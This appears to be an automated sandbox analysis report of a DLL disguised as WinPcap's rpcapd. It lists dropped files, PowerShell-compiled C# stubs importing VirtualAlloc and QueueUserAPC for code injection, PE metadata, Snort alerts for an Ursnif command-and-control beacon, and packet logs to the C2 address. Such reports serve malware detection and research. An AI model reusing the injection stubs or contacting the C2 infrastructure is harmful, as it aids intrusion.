                      SHA1:5474E9C863C4BB1B86DA13FEB1DCBAC13BEA6A83
                      SHA-256:045887EA02E67AD0120E0D470B59C58099BFDBA859F1F3E31989AE8800BC7765
                      SHA-512:CDA6B16F3E42B84FB648CD74482E2B7C4B9E2EB463F8D24A96E3893AD7667D9CBC094AE597AF695AD032ADA6CADE89F3E891EC2F6896966882516BBE7DBC3BF1
                      Malicious:false
                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.s.c.d.h.0.f.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.s.c.d.h.0.f.0...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                      C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.0.cs

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text
                      Category:dropped
                      Size (bytes):417
                      Entropy (8bit):5.038440975503667
                      Encrypted:false
                      SSDEEP:6:V/DsYLDS81zuJlmMRSRa+eNMjSSRr/++5xVBuSRNA5cWGQRZry:V/DTLDfu09eg5rG+5zBlK5Ny
                      MD5:AE91D1351B9FB773FEF9B6F31D0A22EE
                      SHA1:323F9FAD2F10ABDC97A7BF643A35DE67E3A32E31
                      SHA-256:2CEDA574437717CB5084A6D8315F059002F22D45837C60C003F1F09BB0A72DCD
                      SHA-512:94C098F8D6FA16950D6CC582D7303D6B1383126C8DB3AA1C85D7E4E155143E2A4E42B3C96A7B5EFAA53CA3AA8A81CDB97B641D1F4521C67456158C32046A8E23
                      Malicious:false
                      Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class omrgvusmwh. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ooyvxktqmjp,uint oshbdrwt);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr payqgxim,uint tthajtdrqfh,uint vcyatdpvykk,uint vnrytmsowy);.. }..}.

                      C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdline

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):369
                      Entropy (8bit):5.246210484932597
                      Encrypted:false
                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fbNOzxs7+AEszIwkn23fbNYA:p37Lvkmb6KRfT4WZEifT1
                      MD5:1DFF526FD701241566C75FC5465D31AF
                      SHA1:5D91CBBE8D1F790F3A38CE35DAB4F705A0BEEF6E
                      SHA-256:ED2CAE80D53441FB70A3307AEB276D80C5D4176F9A9D336B5C87305DC0064ACF
                      SHA-512:E38E5E1D62A47ACAE2F46256453F82352BD5A6AF881D21EB8EC317AB60B4AE452E95E018271A9DD44FA9176799BFE8FB05E5359AF14399820DF6EDAECE85B2D5
                      Malicious:false
                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.0.cs"

                      C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.dll

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):3584
                      Entropy (8bit):2.6501357671778076
                      Encrypted:false
                      SSDEEP:24:etGSzMWWOJy853Ek0s2E7OgDdWQzbtkZfkd2OWI+ycuZhNsrakSPEPNnq:6pvz5UkGE7vxWQzqJkd211ulsra3PEq
                      MD5:0DB7703243576F0A4B5D43BDB20FD12B
                      SHA1:67974086EB1D388F41FA3D91AB2BE5C6EE06D2CF
                      SHA-256:6B514B672F123A4399CAE02C921B046A1FC00D0A01C34B758A7D14F92E1C8BE1
                      SHA-512:0962E8886173F666E25787071C9794A4A158FAC0226AE3B19E9E954EC2088268172F1F4AE23671A74BF47E715048082E3E7904B32C5EAF74B0EBBE30A6117A2F
                      Malicious:false
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....cb...........!.................$... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................$......H.......X ..p.............................................................(....*BSJB............v4.0.30319......l...H...#~......P...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............1.......................".............. =............ O............ W.....P ......d.........j.....v...........................d. ...d...!.d.%...d.......*.....3.D.....=.......O.......W...........

                      C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.out

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):866
                      Entropy (8bit):5.325866700512367
                      Encrypted:false
                      SSDEEP:24:AId3ka6KRfTJEifTQKaM5DqBVKVrdFAMBJTH:Akka6CTJEuTQKxDcVKdBJj
                      MD5:EE4CA1452DEB397DB57596D3E6012A15
                      SHA1:E8C4E64E4E2C6AE91EB3B78C460A8D65FB9377EA
                      SHA-256:102035269C1F6AC6AECEC5D33A268EDB5A33E3BBA56F775441E271EF9C71A7CC
                      SHA-512:EBEB340BC62C181C89B1694C8DBB2D55326A7F19D987686A5A0F7E1B0A59A2824E488CFDD710F2FFABD8683F8038E0FA5163929004F631216B1EA355FD11BE35
                      Malicious:false
                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                      C:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.089404989746942
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry1Hqak7YnqqGHbPN5Dlq5J:+RI+ycuZhNPHqakSGHbPNnqX
                      MD5:611F888895B72D1096C460FF7EA5E4B7
                      SHA1:67CCD8B6129567C2A7CF8B601FD2709FA13D13D0
                      SHA-256:FFF630440C6AC27F1A70771D2279FE270829A76357941949BA22EB16BD260D6F
                      SHA-512:0FB11E6584AA80780E1C263285F568A6C77773F35D7A3724692C2B8DD0A0E52D3A8CAA2D4F434F69109650B9243DC474C8EA2BD5C157C8734C297E5584912CA6
                      Malicious:false
                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...p.o.e.t.0.y.x.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...p.o.e.t.0.y.x.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                      C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.0.cs

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text
                      Category:dropped
                      Size (bytes):411
                      Entropy (8bit):5.082169696837192
                      Encrypted:false
                      SSDEEP:6:V/DsYLDS81zuJEPWmMRSR7a1TriuSRa+rVSSRnA/fewoZQy:V/DTLDfu+Pdx9rV5nA/PwQy
                      MD5:248E15CD19191D4333303E0E1F8E9A70
                      SHA1:9896EF9708F81AE4E3F2CA86329AD6BD82C700C3
                      SHA-256:0C6C066612882CD36BB425C21983258A23536FFA9E444FE57056C2D95D8B32DF
                      SHA-512:8975F34DBF35E597A91A3F0F75B6A7D074B68A5D597BC3F1CC797EF2C90E4D6F25F9F132A636DD9CA302A2683D26794E0275C6ED0AC4CC8951B07F65C5642FD1
                      Malicious:false
                      Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yifpgxqqbj. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr fsk,IntPtr kjxclvenfq,IntPtr wvolbwmjwax);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint jbsq,uint eftlv,IntPtr hpbmctchgk);.. }..}.

                      C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):369
                      Entropy (8bit):5.22267238940763
                      Encrypted:false
                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23ftUsX0zxs7+AEszIwkn23ftUs2WH:p37Lvkmb6KRf2sEWZEif2sxH
                      MD5:7261F6CD6A6D4860AC034E27509DC55F
                      SHA1:C1282BE561B76009A43FD5BC192CE9D76AF08272
                      SHA-256:F7F9574C754A9C5B3A633B90174E4FAC3FBB9D5657E79D07D9CAAF0BAA8FE5EA
                      SHA-512:CBB1190E96E9929BD12DEB50F2916777C8B8845630DE251A733A49567E7DD290F27673B0918D30B4C6691A0142EEF8A4802D6123DC8BECE77E5CA943CD609813
                      Malicious:false
                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.0.cs"

                      C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.dll

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):3584
                      Entropy (8bit):2.6369801237092227
                      Encrypted:false
                      SSDEEP:24:etGSh8+mUE7R853RY0kCGs+4I4tkZfmPqDZ0WI+ycuZhNPHqakSGHbPNnq:63XE7S505Jm0ZX1ulPqa30Rq
                      MD5:21F3C262E8990FE0E1A44D58B448B899
                      SHA1:2CD298766EC3E59F36C316B35BB0728368117153
                      SHA-256:D594A1A6D450503AB6BDDC352174CC5F680F84CBEEAC0483BB064BA27CB381F0
                      SHA-512:2975E0F079F3D0360854A1249B7A1FBAB7AE5EA851F3A6924302135C03A8DA9E44310CA7E9D82BC672C67755A121B01016B680FE97B060384C3EECF3EE9F9C23
                      Malicious:false
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....cb...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............%.......................".............. =............ J............ ].....P ......h.........n.....r.....}.....................h. ...h...!.h.%...h.......*.....3.8.....=.......J.......]...........

                      C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.out

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):866
                      Entropy (8bit):5.327904541660146
                      Encrypted:false
                      SSDEEP:24:AId3ka6KRf2SEif2eOKaM5DqBVKVrdFAMBJTH:Akka6C2SEu2eOKxDcVKdBJj
                      MD5:51149F7278FBC7AB67B11D6B7BF38CF0
                      SHA1:15D9E224C099E0795568A20DAFACEEA4BF50D88A
                      SHA-256:6477E4EF8AF1EEA40F7734141A2CA95216DCD1BC01C53397ADBEABD2913543CB
                      SHA-512:DCB5699FB0966FF9D79A08AB874CDC2106FD74133878789C469A2EA31970A4B4FBBA138916763DF2C0EAEC64D45120E5A17D1EB5DA7B2D876098DBB4ACED025C
                      Malicious:false
                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                      Static File Info

                      General

                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):6.112861669562404
                      TrID:
                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                      • Generic Win/DOS Executable (2004/3) 0.20%
                      • DOS Executable Generic (2002/1) 0.20%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:VoevdOQpeU.dll
                      File size:640699
                      MD5:ba155d8aed7ca303fcfc3f0248d218e1
                      SHA1:600453c21cdbecdbea9c825df4754b8a1829d649
                      SHA256:a5ea92139f59d185548e8f48d1ce65cbf54bf1e3e1930de221091017fd1d4f0a
                      SHA512:5b58791e43d9fef57d3233ab015ea0609901ab5d7cc70b6a4d0291ea38e0082af06ba9a8996b6ac822d00f9dc3bf014bb5aabeebd5bf480f92e23372e0850582
                      SSDEEP:12288:+w1lEKREbddtOYRbHzcPwka1dCjc3N8ZB:+w1lEKOpuYxiwkkgjAN8ZB
                      TLSH:12D4BD1A029B2102EBB6CE78A751636C54574CE09B01E2CFC9190DA395E34FBF4FA5ED
                      File Content Preview:MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$........9.(.X.{.X.{.X.{...{0X.{...{.Y.{G.-{.X.{~.({.Y.{..M{.X.{K..z.X.{..r{}Y.{.X.{PX.{K..z.Y.{.!8{.Y.{Rich.X.{.......................

                      File Icon

                      Icon Hash:74f0e4ecccdce0e4

                      Static PE Info

                      General

                      Entrypoint:0x401023
                      Entrypoint Section:.text
                      Digitally signed:true
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      DLL Characteristics:TERMINAL_SERVER_AWARE
                      Time Stamp:0x3F4B4692 [Tue Aug 26 11:37:54 2003 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:0
                      File Version Major:5
                      File Version Minor:0
                      Subsystem Version Major:5
                      Subsystem Version Minor:0
                      Import Hash:fd1c62e6f93e304a27347077f6d2b44c

                      Authenticode Signature

                      Signature Valid:
                      Signature Issuer:
                      Signature Validation Error:
                      Error Number:
                      Not Before, Not After
                        Subject Chain
                          Version:
                          Thumbprint MD5:
                          Thumbprint SHA-1:
                          Thumbprint SHA-256:
                          Serial:

                          Entrypoint Preview

                          Instruction
                          jmp 00007F89EC4AA38Dh
                          jmp 00007F89EC4DAAF8h
                          jmp 00007F89EC4AA073h
                          jmp 00007F89EC4A9D2Eh
                          jmp 00007F89EC4AA149h
                          jmp 00007F89EC4A9B84h
                          jmp 00007F89EC4DFF6Fh
                          jmp 00007F89EC4A9C8Ah
                          jmp 00007F89EC4D32E5h
                          jmp 00007F89EC4E31A0h
                          jmp 00007F89EC4DEE0Bh
                          jmp 00007F89EC4E4366h
                          jmp 00007F89EC4A9C01h
                          jmp 00007F89EC4D441Ch
                          jmp 00007F89EC4E6A37h
                          jmp 00007F89EC4DDCE2h
                          jmp 00007F89EC4D549Dh
                          jmp 00007F89EC4AA0B8h
                          jmp 00007F89EC4E99D3h
                          jmp 00007F89EC4A9DDEh
                          jmp 00007F89EC4E5599h
                          jmp 00007F89EC4DBBC4h
                          jmp 00007F89EC4D64AFh
                          jmp 00007F89EC4E53BAh
                          jmp 00007F89EC4AA055h
                          jmp 00007F89EC4E0F90h
                          jmp 00007F89EC4D89EBh
                          jmp 00007F89EC4E8AF6h
                          jmp 00007F89EC4D78B1h
                          jmp 00007F89EC4AA04Ch
                          jmp 00007F89EC4A9BC7h
                          jmp 00007F89EC4E20D2h
                          jmp 00007F89EC4E7A4Dh
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3
                          int3

                          Rich Headers

                          Programming Language:
                          • [ C ] VS2013 build 21005
                          • [RES] VS2015 build 23026
                          • [LNK] VS2013 UPD4 build 31101
                          • [C++] VS2010 SP1 build 40219
                          • [IMP] VS2012 UPD2 build 60315
                          • [RES] VS2008 build 21022
                          • [EXP] VS2015 UPD3.1 build 24215
                          • [ C ] VS2012 UPD1 build 51106
                          • [C++] VS2015 UPD3.1 build 24215

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x970000xc8.idata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x980000x703.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x10000x1.text
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x990000x46b8.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x410010x38.rdata
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x9731c0x254.idata
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                          Sections

                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x3f1700x40000False0.371898651123data4.44682748237IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          .rdata0x410000x4001b0x41000False0.805322265625data7.15716511851IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0x820000x149570x12000False0.179578993056data5.40188601701IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .idata0x970000xadd0x1000False0.217041015625data2.64887682924IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .rsrc0x980000x7030x1000False0.1220703125data1.10395588442IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0x990000x53a50x6000False0.152099609375data5.13419580461IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                          Resources

                          NameRVASizeTypeLanguageCountry
                          RT_VERSION0x981700x3d0data

                          Imports

                          DLLImport
                          WINSPOOL.DRVGetPrinterDriverDirectoryA, GetPrinterDataExW, DeletePrinterConnectionW, FindFirstPrinterChangeNotification, FindClosePrinterChangeNotification
                          msvcrt.dlltoupper
                          USER32.dllDestroyIcon, GetWindowTextA, DrawFrameControl, LoadAcceleratorsA, GetTitleBarInfo, GetMessageExtraInfo, DrawTextW
                          OLEAUT32.dllLHashValOfNameSysA
                          SHELL32.dllFindExecutableW
                          KERNEL32.dlllstrlenW, GetBinaryTypeW, GetModuleFileNameW, GetModuleHandleW, GetLastError, GetNLSVersion, GetSystemWindowsDirectoryA, lstrcpynA, GetCurrentThread, GetDefaultCommConfigW, ExitProcess, GetSystemDirectoryW, GetCommandLineA, FindNextVolumeMountPointW, DeleteCriticalSection, LockResource, GetCurrentDirectoryA, GetDefaultCommConfigA
                          Secur32.dllInitializeSecurityContextW
                          ADVAPI32.dllGetOldestEventLogRecord, FindFirstFreeAce, GetLengthSid, EnumServicesStatusW, RegOpenKeyA, GetPrivateObjectSecurity, GetSecurityDescriptorOwner
                          GDI32.dllGetCurrentPositionEx, GetBrushOrgEx, GetTextExtentExPointW

                          Version Infos

                          DescriptionData
                          LegalCopyrightCopyright 2005-2007 CACE Technologies. Copyright 2003-2005 NetGroup, Politecnico di Torino.
                          InternalNamerpcapd
                          FileVersion4.0.0.1040
                          CompanyNameCACE Technologies
                          LegalTrademarks
                          ProductNameWinPcap
                          ProductVersion4.0.0.1040
                          FileDescriptionRemote Packet Capture Daemon
                          Build Description
                          OriginalFilenamerpcapd.exe
                          Translation0x0000 0x04b0

                          Network Behavior

                          Snort IDS Alerts

                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                          04/23/22-08:12:19.910177 04/23/22-08:12:19.910177TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976680192.168.2.4146.70.35.138
                          04/23/22-08:12:21.823792 04/23/22-08:12:21.823792TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976680192.168.2.4146.70.35.138
                          04/23/22-08:11:59.593120 04/23/22-08:11:59.593120TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976080192.168.2.413.107.42.16
                          04/23/22-08:12:20.776897 04/23/22-08:12:20.776897TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976680192.168.2.4146.70.35.138

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Apr 23, 2022 08:12:19.885525942 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:19.909297943 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:19.909377098 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:19.910176992 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:19.933670998 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.288152933 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.288214922 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.288245916 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.288285017 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.288319111 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.288326025 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.288357973 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.288367033 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.288398027 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.288400888 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.288439989 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.288469076 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.288495064 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.288507938 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.288549900 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.288579941 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.288608074 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.288620949 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.288661957 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.288741112 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.328840971 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.328908920 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.328913927 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.328938007 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.328944921 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.328954935 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.328972101 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.328991890 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.328993082 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.329011917 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.329025984 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.329035044 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.329041004 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.329042912 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.329065084 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.329070091 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.329091072 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.329108000 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.329138994 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.329176903 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.329232931 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.329248905 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.329309940 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.329349995 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.329365969 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.329461098 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.329534054 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.329545975 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.329549074 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.369694948 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.369724989 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.369743109 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.369766951 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.369785070 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.369803905 CEST4976680192.168.2.4146.70.35.138
                          Apr 23, 2022 08:12:20.369812965 CEST8049766146.70.35.138192.168.2.4
                          Apr 23, 2022 08:12:20.369837999 CEST8049766146.70.35.138192.168.2.4
